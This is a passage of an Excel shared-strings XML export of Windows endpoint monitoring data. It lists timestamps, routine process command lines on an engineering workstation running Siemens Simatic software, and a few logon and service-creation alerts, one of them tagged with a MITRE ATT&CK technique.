    <t>May 9, 2025 @ 11:21:07.628</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\ShellHost.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:08.426</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:09.074</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:09.550</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:10.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:11.388</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:11.549</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.172</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.245</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.572</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.630</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.672</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:12.883</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.018</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.081</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.613</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.677</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.871</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:13.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.130</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.539</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.543</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{69B7FE84-6361-4423-B948-1D64820B1E96}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.789</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\SearchHost.exe\" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.796</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.813</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\StartMenuExperienceHost.exe\" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:14.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:16.441</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:DFABG4rRc0W1LPz1.0.1 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:16.643</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:17.307</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:17.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:18.083</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\RuntimeBroker.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:18.359</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:18.987</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:19.535</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\MicrosoftWindows.Client.WebExperience_525.8401.30.0_x64__cw5n1h2txyewy\\Dashboard\\Widgets.exe\" -ServerName:Microsoft.Windows.DashboardServer</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:20.445</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:20.741</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:20.870</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000B14;0000000000000B18;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:21.211</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:21.513</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:21.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:21.711</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:WebExperienceHost.AppXt2rk6m02ana976jna04hdq35jfnzy7f7.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:21.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.226</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.467</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\WebExperienceHostApp.exe\" ms-cxh://scoobe/?surface=mz</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.473</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:Global.RulesEngine.AppXgphnekvm0vv49drvfehh4b6kyf6ckafp.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.485</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.498</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.588</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.662</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.WidgetsPlatformRuntime_1.6.9.0_x64__8wekyb3d8bbwe\\WidgetService\\WidgetService.exe\" -RegisterProcessAsComServer -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.738</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:Global.DesktopSpotlight.AppXz2j21w56bgxkgsjhtn7zkjsepq96erz2.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.870</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:Global.wsw.AppXcx5gg4ftq7samr2je0nxerebxpgp1v9j.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:22.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.057</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.361</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.445</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.493</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.798</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.813</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:23.864</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:28.307</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:28.797</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:29.717</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:30.938</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.284</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\BackgroundTaskHost.exe\" -ServerName:BackgroundTaskHost.WebAccountProvider</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.438</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:WindowsBackup.AppXnn6fnh4raxtmg45ba8k2f4ykb7n0k3y4.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.548</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.563</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:32.698</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SystemApps\\Microsoft.LockApp_cw5n1h2txyewy\\LockApp.exe\" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:33.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:34.641</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:35.523</t>
  </si>
  <si>
    <t xml:space="preserve"> -c -s 0 -f 0 -t Empty -m Empty -a 0 -u Empty</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:35.904</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:35.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:38.087</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:38.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:38.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:41.752</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Common Files\\Siemens\\Automation\\Simatic OAM\\bin\\PNIOMGR.exe\" --start 0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:41.969</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:42.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:44.984</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:45.613</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:45.619</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\smartscreen.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:47.431</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:47.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:50.200</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:52.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:52.484</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:53.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:53.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:53.504</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:53.509</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.709</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.812</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.814</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.816</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.818</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.819</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.820</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.823</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.845</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.904</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.908</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.920</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:54.944</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.751</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.752</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.794</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.842</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.854</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.882</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.886</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:55.887</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:56.024</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:56.025</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\oobe\\UserOOBEBroker.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:56.031</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.193</t>
  </si>
  <si>
    <t>User32</t>
  </si>
  <si>
    <t>127.0.0.1</t>
  </si>
  <si>
    <t>Logon Failure - Unknown user or bad password</t>
  </si>
  <si>
    <t>[T1531]</t>
  </si>
  <si>
    <t>[Impact]</t>
  </si>
  <si>
    <t>[Account Access Removal]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.194</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.199</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.275</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:57.276</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\25.065.0406.0002\\FileCoAuth.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:58.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:58.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:58.575</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.033</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.034</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.035</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.272</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.280</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.653</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.664</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:59.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.321</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.461</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.481</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --default-search-provider=? --out-pipe-name=MSEdgeDefaultc1936047h0c57h43c9h9367h02553fa25a88</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.554</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.630</t>
  </si>
  <si>
    <t>Windows Workstation Logon Success</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.860</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:00.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:01.106</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:01.438</t>
  </si>
  <si>
    <t>taskhostw.exe KEYROAMING</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:01.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:01.442</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:01.444</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:02.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:03.570</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ua /installsource scheduler</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:08.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:08.548</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:08.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:12.788</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=135.0.7049.115 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=135.0.3179.98 --initial-client-data=0x25c,0x260,0x264,0x258,0x26c,0x7ffe36689240,0x7ffe3668924c,0x7ffe36689258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:12.789</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:12.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:12.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:13.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:13.827</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:13.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:13.836</t>
  </si>
  <si>
    <t>taskhostw.exe $(Arg0)</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:13.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.005</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\sc.exe\" start pushtoinstall registration</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.006</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2396,i,6189102461139419838,17949000590786125181,262144 --variations-seed-version --mojo-platform-channel-handle=2296 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.007</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\sc.exe\" start InventorySvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.117</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.119</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2396,i,6189102461139419838,17949000590786125181,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.120</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\wsqmcons.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.123</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\devicecensus.exe\" SystemCxt</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\usoclient.exe\" StartScan</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.125</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" C:\\WINDOWS\\system32\\PcaSvc.dll,PcaPatchSdbTask</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.126</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\UIEOrchestrator.exe\" /SendHeartbeat</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.128</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\135.0.3179.98\\elevation_service.exe\"</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k wusvcs -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.130</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.402</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.802</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2396,i,6189102461139419838,17949000590786125181,262144 --variations-seed-version --mojo-platform-channel-handle=2816 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.841</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\AMD64\\WaaSMedicAgent.exe f4f5ca7ffb86369ed5da5364fcf6d724 qtTdS/O/Z0Co8K7on6RD4A.0.1.0.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:16.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:17.986</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:19.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.182</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.516</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.537</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.539</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.602</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.603</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.604</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.612</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:20.928</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:21.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:21.030</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:21.092</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:21.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:22.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:22.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:22.340</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.383</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.384</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.395</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.396</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:23.420</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:24.185</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:24.220</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:24.227</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:24.228</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:24.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:25.537</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:26.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:26.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:26.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:26.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:27.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:27.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:28.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:28.043</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:28.051</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:28.053</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:28.054</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.900</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:29.969</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:30.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:30.423</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:30.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:31.506</t>
  </si>
  <si>
    <t>taskhostw.exe -flow showtoast -checkup recoverability</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:31.521</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:31.588</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:34.565</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MicrosoftEdgeElevationService\\ImagePath binary is: \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\elevation_service.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:34.678</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:35.460</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV PJM6pP4TAkOuq7I/.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:36.523</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:36.566</t>
  </si>
  <si>
